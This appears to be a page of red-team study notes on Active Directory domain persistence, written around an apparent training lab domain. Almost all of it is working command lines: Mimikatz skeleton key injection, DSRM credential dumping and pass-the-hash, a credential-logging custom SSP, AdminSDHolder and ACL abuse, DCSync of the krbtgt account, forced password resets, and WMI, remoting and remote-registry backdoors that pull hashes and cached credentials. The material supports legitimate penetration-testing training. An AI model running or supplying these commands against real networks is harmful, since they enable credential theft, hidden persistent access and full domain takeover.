Domain Persistance

Golden Ticket -> NTLM hash of the krbtgt Silver Ticket-> NTLM hash of the Machine account

Skeleton Key

Use the below command to inject a skeleton key (password would be 
mimikatz) on a Domain Controller of choice. DA privileges required

Invoke-Mimikatz -Command '"privilege::debug"  "misc::skeleton"' -ComputerName dcorpdc.dollarcorp.moneycorp.local

//it is possible to access any machine with a valid username and 
password as "mimikatz" 

Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator

In case lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC:

mimikatz # privilege::debug

mimikatz # !+

mimikatz # !processprotect /process:lsass.exe /remove

mimikatz # misc::skeleton

mimikatz # !-

DSRM is Directory Services Restore Mode

DSRM is localadmin in DC

// Dump DSRM password (needs DA privs)
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

//Compare the Administrator hash with the Administrator hash of below 
command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

//First one is the DSRM local Administrator.

Enter-PSSession -Computername dcorp-dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd  /run:powershell.exe"'
ls \\dcorp-dc\C$

Custom SSP

Drop the mimilib.dll to system32 and add mimilib to 
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages:

$packages = Get-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security 
Packages'| select -ExpandProperty 'Security Packages'

$packages += "mimilib"
Set-ItemProperty
HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security 
Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name
'Security Packages' -Value $packages

– Using mimikatz, inject into lsass (Not stable with Server 2016):

Invoke-Mimikatz -Command '"misc::memssp"'


All local logons on the DC are logged to 
C:\Windows\system32\kiwissp.log

AdminSDHolder

Add FullControl permissions for a user to the AdminSDHolder using 
PowerView as DA:

Add-ObjectAcl -TargetADSprefix
'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
student1 -Rights All -Verbose

Using ActiveDirectory Module and Set-ADACL:
Set-ADACL -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local' -Principal student1 -Verbose


Other interesting permissions (ResetPassword, WriteMembers) for a 
user to the AdminSDHolder,:
Add-ObjectAcl -TargetADSprefix
'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
student1 -Rights ResetPassword -Verbose
Add-ObjectAcl -TargetADSprefix
'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName
student1 -Rights WriteMembers -Verbose



Run SDProp manually using Invoke-SDPropagator.ps1 from Tools 
directory:

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -
Verbose


• For pre-Server 2008 machines:

Invoke-SDPropagator -taskname FixUpInheritance -
timeoutMinutes 1 -showProgress -Verbose



Check the Domain Admins permission - PowerView as normal user:

Get-ObjectAcl -SamAccountName "Domain Admins" -
ResolveGUIDs | ?{$_.IdentityReference -match 'student1'} 

• Using ActiveDirectory Module:

(Get-Acl -Path 'AD:\CN=Domain 
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Ac
cess | ?{$_.IdentityReference -match 'student1'}


Abusing ResetPassword using PowerView_dev:

Set-DomainUserPassword -Identity testda -AccountPassword
(ConvertTo-SecureString "Password@123" -AsPlainText -
Force) -Verbose


• Using ActiveDirectory Module:

Set-ADAccountPassword -Identity testda -NewPassword
(ConvertTo-SecureString "Password@123" -AsPlainText -
Force) -Verbose

Forece change password

PS> Import-Module .\PowerView_dev.ps1
PS> $SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
PS> $Cred = New-Object 
System.Management.Automation.PSCredential(‘dcorp\user’, $SecPassword)
PS> $UserPassword = ConvertTo-SecureString ‘Password1!’ -AsPlainText -Force
PS> Set-DomainUserPassword -Identity prodadmin -AccountPassword $UserPassword 
-Crendential $Cred

ACLs – Rights Abuse

Add FullControl rights:

Add-ObjectAcl -TargetDistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName student1 -Rights All -Verbose 


• Using ActiveDirectory Module and Set-ADACL:

Set-ADACL -DistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
student1 -Verbose



Add rights for DCSync:

Add-ObjectAcl -TargetDistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName student1 -Rights DCSync -Verbose


• Using ActiveDirectory Module and Set-ADACL:

Set-ADACL -DistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
student1 -GUIDRight DCSync -Verbose


Execute DCSync:

Invoke-Mimikatz -Command '"lsadump::dcsync
/user:dcorp\krbtgt"'

Security Descriptors - WMI

set-remotewmi.ps1

ACLs can be modified to allow non-admin users access to securable objects.
//USe RACE.ps1

• On local machine for student1:

Set-RemoteWMI -UserName student1 -Verbose


• From admin's Session:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace
'root\cimv2' -Verbose


• On remote machine with explicit credentials. Only root\cimv2 and nested namespaces:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc -Credential
Administrator –namespace 'root\cimv2' -Verbose


• On remote machine remove permissions:

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace
'root\cimv2' -Remove -Verbose

Security Descriptors - PowerShell Remoting

set-remotepsremoting.ps1

On local machine for student1:

Set-RemotePSRemoting -UserName student1 -Verbose


• On remote machine for student1 without credentials:

Set-RemotePSRemoting -UserName student1 -ComputerName
dcorp-dc -Verbose


• On remote machine, remove the permissions:

Set-RemotePSRemoting -UserName student1 -ComputerName
dcorp-dc -Remove



 gwmi -class win32_operatingsystem -ComputerName dcorpdc.dollarcorp.moneycorp.local

Security Descriptors - Remote Registry

Using DAMP, with admin privs on remote machine:

Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee
student1 -Verbose


• As student1, retrieve machine account hash:
#replace the variable $iv with $initv
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose


• Retrieve local account hash:

Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose


• Retrieve domain cached credentials:

Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

 gwmi -class win32_operatingsystem -ComputerName dcorpdc.dollarcorp.moneycorp.local

PreviousDCOMNextGolden Ticket

Last updated